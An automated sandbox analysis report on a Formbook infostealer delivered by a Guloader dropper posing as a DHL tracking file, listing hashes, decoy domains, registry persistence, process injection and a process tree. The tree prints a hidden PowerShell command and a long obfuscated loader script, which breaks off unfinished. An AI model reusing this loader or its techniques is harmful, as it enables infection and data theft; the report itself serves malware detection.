formbook | 7a55e4b3f800275bc0f7c00cd337d0dd83379ef845fce3fa55b86d68092c1b9c

Analysis

max time kernel
145s
max time network
142s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
12-07-2023 06:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe
Size

497KB
MD5

cad1eb405fa1ac324c712c9090e0c08f
SHA1

7497b8c739994f003d248b8bd2a62d526c1b902d
SHA256

7a55e4b3f800275bc0f7c00cd337d0dd83379ef845fce3fa55b86d68092c1b9c
SHA512

0ed96fb9c3ceb1238d4ea26b206ef22e1aba01b8bf48b3d1074a1411e59db2393373f1c6cfca3dedd8e9b325f8af0dd31a6db6462ba3f79db8600a44cb83a6cf
SSDEEP

12288:sC3+YT7k0PwTrVg0iTYYXQZbnnTOnVm4j5VyP+:sa+YHL41ghXA9iVm4j5M+

Score

10^/10

formbook guloader il09 discovery downloader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

il09

Decoy

ahy99.com

tmzrygdv.cfd

trainingwithoutnerves.com

loaddirecters.com

elocquinn.com

sunnahscents.com

jogobrgames.xyz

skinkissedaesthetics.com

943465722.xyz

jopkrrub.cfd

kavrex.com

sensori.host

sybrstrmtdiyari.com

ourouba22.app

smilebrandsbreacsettlement.com

72um.asia

kenleyeventdesign.com

mandalastudioonline.com

much2more.com

beckettbees.com

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Formbook payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/2780-157-0x0000000000400000-0x0000000000615000-memory.dmp	formbook
behavioral1/memory/1472-165-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook
behavioral1/memory/2780-166-0x0000000000400000-0x0000000000615000-memory.dmp	formbook
behavioral1/memory/1472-168-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook

Adds policy Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-264077997-199365141-898621884-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	ipconfig.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ielowutil.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-264077997-199365141-898621884-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	ipconfig.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-264077997-199365141-898621884-1000\Software\Microsoft\Windows\CurrentVersion\Run\GZVHTLWH = "C:\\Program Files (x86)\\internet explorer\\ielowutil.exe"	ipconfig.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2780	ielowutil.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1520	powershell.exe
2780	ielowutil.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1520 set thread context of 2780	1520	powershell.exe	32
PID 2780 set thread context of 1268	2780	ielowutil.exe	20
PID 1472 set thread context of 1268	1472	ipconfig.exe	20

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Scrofulas\Scooch\Overmaalets.ini	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\Cleanlier\Llet\Laasesmedenes.Unc	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1472	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-264077997-199365141-898621884-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2120	powershell.exe
1520	powershell.exe
2780	ielowutil.exe
2780	ielowutil.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1268	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
1520	powershell.exe
2780	ielowutil.exe
2780	ielowutil.exe
2780	ielowutil.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe
1472	ipconfig.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2780	ielowutil.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeDebugPrivilege	1472	ipconfig.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1268	Explorer.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 2120	2308	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe	29
PID 2308 wrote to memory of 2120	2308	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe	29
PID 2308 wrote to memory of 2120	2308	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe	29
PID 2308 wrote to memory of 2120	2308	ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe	29
PID 2120 wrote to memory of 1520	2120	powershell.exe	31
PID 2120 wrote to memory of 1520	2120	powershell.exe	31
PID 2120 wrote to memory of 1520	2120	powershell.exe	31
PID 2120 wrote to memory of 1520	2120	powershell.exe	31
PID 1520 wrote to memory of 2780	1520	powershell.exe	32
PID 1520 wrote to memory of 2780	1520	powershell.exe	32
PID 1520 wrote to memory of 2780	1520	powershell.exe	32
PID 1520 wrote to memory of 2780	1520	powershell.exe	32
PID 1520 wrote to memory of 2780	1520	powershell.exe	32
PID 1268 wrote to memory of 1472	1268	Explorer.EXE	34
PID 1268 wrote to memory of 1472	1268	Explorer.EXE	34
PID 1268 wrote to memory of 1472	1268	Explorer.EXE	34
PID 1268 wrote to memory of 1472	1268	Explorer.EXE	34
PID 1472 wrote to memory of 2760	1472	ipconfig.exe	35
PID 1472 wrote to memory of 2760	1472	ipconfig.exe	35
PID 1472 wrote to memory of 2760	1472	ipconfig.exe	35
PID 1472 wrote to memory of 2760	1472	ipconfig.exe	35
PID 1472 wrote to memory of 2760	1472	ipconfig.exe	35

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Users\Admin\AppData\Local\Temp\ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe
  "C:\Users\Admin\AppData\Local\Temp\ΠΑΡΑΚΟΛΟΥΘΗΣΗ ΔΕΜΑΤΩΝ DHL.exe"
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -windowstyle hidden $T32 = Get-Content 'C:\Users\Admin\AppData\Local\Societyese23\Blomkaalssvampes\enleaf.Gon' ; powershell.exe ''$T32''
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Observationstaarne Cranelike Monsignor Cinnoberet Retslgen Elapoid Maned #>$Hexapods = """Ov; SFBruEnn Uc Bt PiFoo bn S MaS Tu RmRem RaHetKveRosfr0 V4 L un{Bu So Aa L Cap RaGer Sa qm g(Gu[SkS ctSar Pi VnDigMo] D`$TrK Ko Rm bp MrGao HmSuiCit Pt Se Dr FeDedMeeFjnPrtBewDii BsAmtFo)Br;un M st Ny S`$ PSHoaFlt UuDerSonSyi Ot ByTe Sm=il FN MeSiw B- TO CbFajMie Ic OtKl SbPey Kt EeLg[st]Br Sl( D`$ UKFeothmOrpStrImo PmPei Ot MtBueKvrareNod CeKonSutLiw SiUnsAct V.MeL GeAgnBfgDit Ch K Ak/ U Un2Mu)tr;Pa Ha Al Us PFProUnrNo(Ma`$VeKEuo Smkop MrcoowimUdiDotTot AeDurBoeurd JeCe=an0Sa; A Sk`$ aK LoRemBjp UrSuo GmUniPrtEutdre Mr TeDvd IeMo A- HlKetIn S`$ BKRao BmpepRerRaoSvmCii MtCut BeSvrLeeFjdPae anIntRuw Gi AsMat R.diL Ke Ln CgDetshh S; F Kk`$ TKShoInmSep Wr ToStm SiBrtPotFieZorMye GdHyeBa+ T=Pl2De)Di{Sl fa ac Fl Bu Ju Ps Tr Tu`$kaSUnaEktDiu CrHjnCeiFrtTry F[Rv`$ CKOboDrmKapTor RoComSoi VteftHoeStrAme FdCoe F/ R2Fl] D Ov=Sw Va[OrcSlo LnzevBee Ar St R]Un:No:FiTKooEnB ByRet Ne X(Ty`$ MKUno Mm tpBir eoExmStiAft CtBae SrFae DdBue tn FtAaw PiUnsAmt G.ImSDouRabHosFit vrDyiMunOpgLu(Ec`$KlKlio DmGrpForReoSkm eivitInt Se PrDreNodReeUn,Sa Un2Ga)br,Af Di1Fa6ul) M;Sv C Sk`$ OS La PtWhuPerIdnTaiExtUfy S[Dy`$SaK Do fm DpLarSionom Jiblt Tt te UrVoe Vd Fe T/ K2 P]Lu Kr=Sw S( D`$ThS Da ctNouSkrspnFaiOit Ty H[Ma`$ FK KoOvm Lpdar FoSnm SiSttHutBaePurCyeBod EeFi/Br2Sm]No St- ObNoxGro SrUn Pr3De5As)Un;Ti Mi Sn Fo M}Ri Mi[UnSAntMorToiEmnLigst]Mi[ SS ky RsTrtSke WmOr. JT Pe ExStt F.VoE AnErc hoPrd AiUnnSlgKo]pr:Ga: PAPeSRwC FI FIDo. dGJiekotScS Gt FrHui SnBrgHu( R`$ KS OaMat tuSurSunAniCatChyNo)Ka; V}Sc`$AtSTntAbaPev ReAil Bs Je SsFo0 I= CSFouDimIsmskaFrtDre Os R0 n4 C No'Tr7Re0Fy5 SAKu5An0 f5Pr7Ub4 b6No4PiEPu0StD S4 P7Co4SpFDi4InFTi'He; I`$ FS DtSkaAnv Ke SlKlsHaeUdsUn1 M= PSBruStmFemLaaAptSme Hs Q0Tu4Li M' H6ReEEm4huABi4py0 B5Ve1Em4FaC P5 U0 R4 NC K4Pa5 s5Je7To0KlDId7No4 B4 AAVi4 ADUn1 L0 R1 L1 P0AnDNo7 S6 c4 RDto5 I0Tr4Me2Gr4sk5Ko4En6 B6UpD S4 a2 G5 a7Ve4 AADa5 E5 D4 L6Na6 LE D4Co6 L5Ra7ph4 OBMi4 UCdi4 P7In5 S0We'Be;Un`$ hSClt Pa SvIne Hl msOveHesEp2El=JuS TuTrm AmPea HtSaeInsSt0 U4 S P'Ja6 F4Pe4St6Un5An7 G7Fi3 G5Un1 B4CoCKo4Un0 g6fj2 m4 S7py4 T7Ca5 P1au4 E6Sp5 S0Mu5De0Ta'Ba;Pr`$PiS AtPiaArvBeeTrl As Ue OsHy3Lo=FaS UuRem Pm BaDutToe FsWa0Ec4Da Br'Ra7 K0 L5SpA S5In0Br5 b7 D4Na6Ly4 HE D0 NDMi7 A1Ma5Un6 U4InD S5Ln7As4peA B4inEna4Fo6Co0moDdi6SmA G4 KD B5 P7Du4St6 S5Vi1ka4 OCEv5Wr3Ge7 S0Us4 R6Ar5Bo1Po5Pa5Ch4BoAHy4 B0Pr4 U6 U5Jh0 L0 SD S6 RBSa4Te2Sy4GuDEx4Be7 G4EmF W4De6St7Me1 H4Ou6Pe4Ka5 I'Ab;Gi`$ USaft KaDrvInetrlSasMie usSo4Kh=SpS Au Gm KmAua FtTce Us E0 P4Ag Fo'to5 R0 F5 T7Dd5Fo1Sp4WhASu4 BDPl4Ro4lf' a; U`$SyS NtopaDav Ce plGusHeeFos L5Fi= MS KuBamsomBla FtSleGos E0 P4 M F'De6 C4Di4 U6 S5La7 S6 BEUn4 NC T4Sn7 P5Ac6Po4 RFSa4 M6 S6 ABPa4 S2ud4DiD J4An7Af4 EFSk4 S6 A' s; S`$ OSSvtBrarevtre ElNasKie As C6We= VS fuPjmSkmDua Pt DeFasMy0Hj4Tw Ph' S7Un1 P7Pr7As7Re0Da5Fo3Ta4Fu6Gu4Ha0Hy4DiA N4 G2Ca4FoFRa6 CDDi4Un2Sl4PeEBu4 B6eg0 mFTo0 F3Al6TaB D4HoAHa4Au7 F4 a6Pr6 F1Uf5 LA S7Hv0 S4IsATh4sy4 V0ShFTo0 S3Ge7Ho3pe5 T6 L4Gu1 S4SaFUn4AlASi4 F0Bo'Bl; U`$MeS BtBiaHyv De PlSksSceFrsNo7 C=efSNou RmFomPiaAmtTieVis H0Ef4 Y Dr'Un7Sl1 S5Fo6 M4 TDun5In7 O4 KAIs4UnETr4At6No0RiFKi0ki3Rm6 BECo4Be2Un4DeDAa4Be2 K4 Y4 S4Fr6Ca4br7Ir'Sp;Gr`$UdS At Ha Bvfle Dl Ds Se TsKa8Fo=ToSCouFlm Dm PaRet CeMas L0Fr4Ku Fi'Mi7 F1Na4Me6Ut4Ch5Fi4 AF R4 A6Sa4 P0 M5Fe7 D4 M6pr4Sk7 S6 T7Bl4 T6Fo4AfF S4Ir6 C4Ri4La4Kr2Sp5 D7Mi4Fi6Ir' O; K`$ MS StTaaCav LeUflsasFeeSvsth9 M= DSUnuHemComTraSttSee GsFr0 a4 l Um'Ko6 SACi4UnDEa6AeESi4 F6Am4 DE F4 RCGi5Va1Sy5MiA M6 RE F4 BCfo4 M7Bl5Ap6 K4 MF t4 P6 R' S; B`$ DrJaaFrl MlDoitok Fe AsSt0Li= rSDeuTrmPrm oaDrtGaeDisUd0 I4De La'Fa6InE S5DoAbi6 E7 I4Un6 S4MoFFr4Qu6No4Un4Un4La2 f5Ap7Re4Su6 L7 e7 P5SlA A5To3Ce4 F6An'Po;Tu`$unrNoa alEklLoiTokAdeNes C1 S=DeS Wu Pm SmStaPotChe ssfr0 o4Ty c' L6Za0 E4EnF A4Ci2 B5Ma0Kv5 C0 D0 PF R0 W3No7Co3In5 g6He4Ma1De4OuFBl4 SA O4Bi0Cu0LeFCh0Ta3 S7br0Kn4 W6 B4Eq2Di4CoFNo4Vi6Re4 I7 B0 EFAi0Sl3 S6Ki2Fi4HeDSt5Fi0 H4BuA g6 N0Sa4UnFSy4Ka2Se5Ri0 K5 S0Do0 UF D0 F3 S6 U2 s5Sp6Pa5Se7ak4SpC F6Di0 F4elF H4Ov2 C5 S0 M5 S0un'Ex; P`$ Qr GaAnlSklSpi Ek LeSasGu2Sk= SSPeuNamAfm Ca StBreHossu0Sk4 L Sm' C6KrA K4 CD F5In5Un4 SCfu4Tr8Ta4Pa6No' B; U`$Ugr AaEkl Pl CiBok UeScsRe3 R= RSGnu BmFimMoaUotDaeOps R0Gr4je Fo' P7Dy3 U5 B6 M4Ra1Se4SuFAp4MeA E4 E0Ve0PaF K0Bd3Al6FoBPr4 FA D4 P7Jo4 F6Su6 I1or5TiASe7 C0St4FuATy4 H4 A0SkFTy0 S3Az6DiD B4 P6 A5 V4 A7Mu0ba4KaFha4 UC A5Sh7 N0foFUn0 B3 V7Dy5Ty4 AA A5 B1Av5 A7 U5 S6kd4Fi2 G4 BFLo'Fi;re`$PrrQuaRilBel Vi Uk Le AsTj4 G=MgSFou MmBumSaa Wtgee Us T0 C4 t Zi'Ma6 F0Pi5Vi1Um4Bo6 K4 M2Sa5En7An4 F6Vi6 S5Or4 BA U4PlF I4 T6 F6moE b4In2 c5 M3 H5 H3Be4 UAsk4BuD N4Vo4In6Br2As' S;Bo`$JorEpa AlZolTiiPakEaeTrsPa6De= NS Au HmAcm SaNot DePasst0 A4ud H' S6PhEBe4Di2Re5 G3Ca7 S5 A4AmA H4Da6Re5Pr4Ov6ImCes4Mi5 M6Le5Br4RaAAf4VaFOv4Di6 F'rh; L`$Var CaMolovlRei nkDaeBos R7De=AcS Eu vmFrm ca Ft DeFrsAa0 T4 S S'Pe6 BATh6Om6Bo7 AB E' T;Ka`$ IrRga Tl PlChi OkKleSes M8Ka=ChSDiu ImSom Ta Mt ReKasUn0 M4Do S'Po7 AFSu' K; S`$BlTKnuShtNet Bi SeBes P1 F2 P5 D=tiS MuBymSum PahatMeePes s0Am4Li Re'Hu6 S6sy4MeDka5Ma6Ov4InE O7 S1No4st6No5 B0 M4 ECMe5 H6 O5Ki1Ti4Of0Fa4Sw6re7 L7Ik5 AA P5un3 B4 A6 V5Di0 S7Er4 M'Ko;La`$SaHGluSpnVedSkr Pe CdPreCed AebalPe O= G OfS HuBrmAsm Ua Bt aeAasCo0 B4Se D'Fo4Fl8 S4Pe6 E5so1Or4 HDoo4 A6 S4InFSk1Ko0Ko1Sk1Gu' S; FfMiuAfn FcStt PiCoo FnPe CfAukAfpOp Py{ SP BaPrr BaBim C S(No`$ TLOfeCazfog UhPaiOraFan F, D Hy`$HeKAaaImr StSkl KeEdrdi) O Mi A ti C so;Sc&Pe(Ps`$ frFnaNalAnlToi BkLieDrs B7Ai) P Ku(PeSBeu Om BmWaaHotGre IsKo0Af4ps P' U0Vi7Fl6Ro1Sk5 a1Nr4KyCTi4 GDHe4Ov0Co4SiBTi4StC F5ud3Si4 DDCl4 R6 M5De6He4 PE O4WoCBi4AmDun4inA I4ep0Co0 C3Ca1 BECi0 G3Fa0 bB U7 P8la6Ko2 R5Au3Mi5Al3 B6Pa7 I4MaC B4 VELo4 G2Re4StA E4AlDUn7 SE N1 A9Fu1Ju9be6Fo0 C5Sj6Ti5Un1Pl5Di1Fl4Mi6Sa4 cD S5 E7 I6Se7Am4 oCAr4 CEBe4Br2Gr4AnADv4LaDEj0ArD V6su4Un4Ub6ma5Ks7Ze6In2Me5Ku0On5Bo0Ra4eg6 A4UnEOr4Ph1 K4 lF r4 UAHy4 M6Dr5Ra0Se0unBPu0sgA B0 s3Wa5BuFPa0 F3 S7Om4Kl4 PB S4Un6Of5 H1 U4Bi6Si0HyE E6UdCch4Ps1Mu4No9Zo4Jo6 f4 C0 d5Pr7Er0Ec3No5 T8Si0 O3Sl0Be7Sa7heCRe0FaD U6Di4Sa4PaFVi4 FC S4 u1Fe4Ka2 M4 LFSs6 P2Be5Qu0 U5 H0Sy4 L6Af4PsE T4Po1Ko4 pF D5KrA A6 F0 L4om2 E4Ki0 A4 TBre4 M6ha0 C3 S0WoEBe6De2 M4HaD S4St7 S0An3Re0 s7ta7DrC H0 JD C6grFSa4 hC U4El0 B4 G2 M5 S7 C4 EA G4MiCVe4ZeDSu0LnDSh7En0 I5 U3 R4IsFSp4KoAFr5lo7Fs0AaB D0Tu7 N5Do1 I4 G2Tr4MoF m4GrFMe4ZaA R4St8 A4Di6Ic5Ba0 P1KaB S0RhAOm7 U8 M0HuEMa1 J2 S7 BEGe0PaDDe6Kl6Pr5 l2St5 C6Ou4Ma2Em4UnF W5Pr0 U0VoBMe0Ap7 c7 B0In5ma7Se4 M2Sc5 D5 l4Da6wr4JaFCh5Sk0Ja4 K6Bl5Hn0Mo1 V3 V0 UAfl0To3Re5StEul0stA O0KpD C6 B4Tr4 C6 R5Pa7 f7Af7In5StALa5Fi3 B4 S6 T0DeBHe0 s7 R7 D0 T5 U7fo4 F2No5 S5 B4 V6 C4MiFBe5 K0 A4Ti6 R5 I0Th1 S2 f0 CA P'Fa)Gi; T& P(St`$Err Ua Ul BlSci Pk Le HsKu7Fe)Le Pr(PeSUdu AmAtm Faset Ce Os H0No4Ra Ac' C0 A7Ca7Ph6 E5Po0 F5 A7 M4 C6ex5 S7Mi4 BATh5 M0Kr4No8 S0kl3In1DeE S0Pa3Af0 d7 E6Rh1Bo5en1La4JeC C4 PD E4Ka0Be4DiB B4GrCGe5 O3Ek4 DDTh4Am6 P5 B6ce4 PE W4 SCAg4InDSo4 UAUn4Ph0Pa0TyD U6Bu4 B4 F6Uo5 F7Un6RaEHe4Im6 G5 F7 R4CiBHe4 EC U4Bo7 P0 DB F0Va7Tn7 P0De5Va7So4Or2Pr5Wr5Ut4 K6 H4 TFSp5 I0Tu4 T6 L5Go0Ma1 T1Bi0 PFov0Tr3 H7Un8 U7 E7 B5 NA S5Re3 R4La6 G7Ha8Pr7BeE R7AeE A0Fu3Fi6im3 U0BeB L0 I7sp7fe0Fo5vi7 F4 V2 T5 O5Mi4ba6Fn4 DFta5Di0Sp4Va6 E5 M0 C1 S0Hu0 TFGe0Ar3 R0Ud7 s7 P0 T5 O7Ad4Gl2cr5Na5Fu4Ga6Pu4suFRe5 T0Tr4On6Un5St0Sa1Ca7Un0hoAPr0CyA P' F)di; A&ku(Tr`$Grr RaKul Ml Bi BkeseRasPe7 M)Tv Ku(UnSAfuGrmNom IaPrt Se UsIn0Se4 K D' G5Su1al4 I6 r5 B7Ut5Be6Be5 T1Re4CuD D0 D3He0 U7Hj7Sn6 P5St0Go5Al7 C4Or6 T5 L7Ha4StAKr5Mu0ne4 B8Am0 BD L6 ZA S4DeDHe5 R5Ha4hyC I4Un8 P4El6In0 OB E0 R7 E4TrDba5 d6Ch4BiF M4CoF S0trFMe0 P3Mi6 k3Pr0 RBSw7Vi8 s7 M0 D5StARe5Ma0 M5To7 S4 F6 U4HuEUd0 HDNa7tr1Br5Kr6 a4DiDRk5Un7Vi4GsARo4 DEAr4Ho6Fa0TuDif6 NA J4 MD L5Af7De4Op6 b5 E1Fl4 SC N5Nu3Mu7gl0Ja4Io6Un5Sk1Ve5te5 B4vaAKo4Ph0He4Ba6Ab5Mi0Gr0EnDma6 EB H4Re2En4GuDMa4 U7Bi4 RFVi4 O6Ta7Qu1So4Ju6 S4 A5mo7GrEUd0 CBSk6PaDBe4At6Ha5 S4Ge0AnE R6 aC R4 S1Al4 E9Ir4 C6 L4Ei0 V5 k7ma0 S3 D7Br0 L5 LARa5La0hi5Te7 A4pi6 A4PrEBl0UnDAt7 U1Mi5To6Pr4MuDHy5Sy7Bj4GoADe4chE P4Pr6Pl0 HD O6 SACi4MyDAd5Ly7Bo4 S6 A5Mo1In4 MC O5Tv3 Q7Fr0St4ch6 L5Un1Af5 P5Sk4 UASi4Re0Pr4 o6 D5Ge0 E0 SDHa6afBWh4Un2Ho4wiDIn4fo7Ph4 KFba4 V6Pe7 G1Ma4Pr6To4 S5An0OuBDe0SkBOr6SmD B4Tr6Pr5Ha4 S0ReEki6StC b4Su1Fo4Bo9Ph4Fe6Ku4Bi0It5 H7Av0 S3 G6IsA T4 GDEk5 A7Ko7 M3 F5Un7 B5 D1St0 GAFo0 KF P0Ne3 Z0GiB v0Om7 L6Sk1 U5 P1 s4AkCDa4StDpe4De0co4 BBPo4 ACmn5Ba3An4 RD J4Sa6 B5Ga6 A4CoE I4ExC U4MeDUn4 DA B4Ta0 d0NoD A6 I4Li4Ro6Cr5 B7 S6ImEfl4Fa6hv5 S7ar4 dBHa4 HCWi4Pe7Lo0OvBPi0Ma7Su7Tu0 B5 A7 C4 P2Co5Be5St4 E6In4BlF B5Re0Hn4Al6 R5Pr0 s1Gr6An0 tAAl0BrA S0HeDIn6 BA A4IgD r5Am5St4AcC B4Sm8Af4 D6 c0SmB F0Re7Fo4FlDMi5St6 e4AaFMl4 aF A0EnF M0At3 h6Ti3So0teBAs0Re7 T6 uF D4De6 E5Pe9so4So4Bi4PhBRu4ReA V4Ma2 H4 AD C0DiADe0 TApr0 KA A0UnA O0CoF B0Uj3Sk0Pe7Pl6Ob8Af4Cy2 S5 P1Fr5 A7Af4 FFWa4He6 D5 M1 D0 NADy0DdASt' G)Be;Sk} EfFou LnFic LtLyi NoCon C OGSoD ST M s{DeP Ga SrUnaAcm R C( R[ PPReaUnrunaKom PeCotLbepar B( aPVeoLisHyiGatStiEloKvnLo Bo=Ng Fi0 K,Sv SkMOvaTrn ZdIma CtedoUnrPey u Ko=An Oe`$ReT erSkuDie F) P]Ma Op[ TT FySap ge U[Gu] U] A R`$GrP TrSle Sd ToDem Di an FaSptMaiunn NgTi,Fo[MoPGra Sr TaClm GeMit Me urOx( LPGeo Bs Ti Rt Ticho on A Vu=Co Ju1 R)Ol]Aa A[UdT KyBep TeAn] C Pa`$BeMBiaDaaamn IeOrd IsSklAnnBlsSt Hi=Ga Te[GoVRioBei Sd D] m) A;An. U(En`$ IrAcaLalSplEkiCok Ge tspr7 c) O Sg( IS Au Om BmSva Rt VeAfsUd0is4 P H'ph0 F7 o6GoBPs4 S6Pa4 EDUn5De5 R4 AASt5No0Pr4 DDIn4 CA S4PoDUn4Pl4 R5Po0Br4 U5En4DtCMi5Ka1Ve4 SEEl4Cr2 V4 C2Sl4EsFFu4 P6Pe4SyD G4Si6 N1Si2 H1 H6 K1 C1Pa0Ti3 R1UnE J0Sa3St7Te8 S6De2Se5 A3Om5Mi3de6 c7 k4meCje4 PE C4Fo2 P4FrAHa4WaD W7GaE U1Re9kv1 S9ku6 N0No5 A6Ma5 S1Su5Pe1Un4Ho6Ha4 SD P5So7Ko6Tr7 L4UnC H4DeE S4 d2Be4 QASt4 TDka0UdDHa6 a7An4Mu6St4 h5Su4 FADe4 SDSv4Ko6Ov6 I7De5FiAba4DuD L4 H2St4gaEUn4 AAUd4Un0be6No2Ga5Mi0 R5 M0pr4 C6 S4arE T4 H1Hj4 lFMi5FlAIn0OpBIn0 NB a6StDSm4Ol6Go5Pa4Pe0UnEAc6EsCRa4In1 H4 s9Fi4Go6 O4Ge0Be5Vv7 D0Vi3 S7Ma0 U5RoAGi5Ba0Sh5 L7Ho4Wa6 U4PrEPe0StDAn7Ly1Sv4 A6Je4 R5 S4kiF D4ra6 C4Ek0Cy5Sa7Ov4AnAUn4SpC f4ThD M0GrDDo6vi2 T5 S0 T5Br0Cu4 S6Jg4ReETa4 O1Fu4 CF B5OpA P6InD H4Co2 T4MiEHy4Pe6 U0 sB p0 U7Au7Sk0 A5ng7Ny4Af2Si5Cy5 N4 S6un4 DFLu5Se0 N4Ha6De5De0un1BeB F0KmAOp0ChATi0 CF D0Bi3 R7 I8 G7 G0 P5reADi5Pi0 C5 D7 M4ga6De4FiEXe0 PDOv7Ha1Le4Pe6 a4Be5An4FoFFl4Na6Be4ef0 O5Sa7Ej4 UASn4TiCSu4 ADCo0BoDBr6Pe6Dr4diEMo4BoA s5Re7 m0VaDOm6Un2Un5 G0su5In0 S4 O6Un4DeE R4Ro1Fr4WaF W5 EA B6In1 T5 R6 N4SuA c4 AFom4 F7 R4Bu6Ko5Ti1Fa6Gl2 I4 S0 N4Na0 O4Ce6 T5Ol0 R5Ca0Or7 IEAi1 S9Sk1 R9Al7 N1 V5 S6Ti4SvDSu0 IA N0 AD u6 K7Om4Re6fi4Do5An4KeA H4ShDAg4 S6 U6Ar7Ko5 FA B4 HD I4 U2 D4 SESk4VoAgr4 U0 F6 KEKo4KvCor4Ha7 S5 A6 S4ReFKo4Tv6Fi0 kBMe0Ge7 R7De0Un5 U7Ny4Bu2Gr5ve5 U4Se6Po4 SF B5 T0 B4St6En5 P0Ut1 TAIn0 FFVe0 W3 R0 F7Gi4Ve5 a4 M2Ac4DiF T5Af0Al4Fe6Ev0fiAUn0BaD S6Ch7 F4Ma6 K4Pl5Hy4UdAep4ByDTu4Sn6Cr7Ge7 C5 EA D5Ko3 K4 T6Im0CoBsp0Im7Ch5 C1Fi4 b2bu4NaFAf4IiFNk4 KAFe4 S8Ca4Bi6So5El0Kr1Sk3Wi0 RF V0 A3Ac0An7Te5Ur1An4 P2 C4 KFGr4BiFBa4PrAFo4 G8Og4Pr6 F5Mi0Us1 k2wi0TaF B0 A3Ak7Sc8Ub7 T0Br5RiARa5 g0 K5 S7Op4 V6Sa4KoESp0 SDCh6 GERo5Ve6Ap4 FF K5Pr7 D4PyAAn4Pe0 E4un2Re5Ac0Ma5In7 C6Ge7Co4Sl6 T4 CFSt4Ho6 B4Sn4 T4 H2 J5 P7 D4Tr6 G7foE O0LeA b'Un) S; U.En( U`$ ArBaaFal Ml RiCokkaeats P7 D) S S( USLbuUdm PmKoaExt Fe KsUn0 P4By Ia' l0Sc7In6TeBme4Kr6 I4 SDUn5Sm5 B4 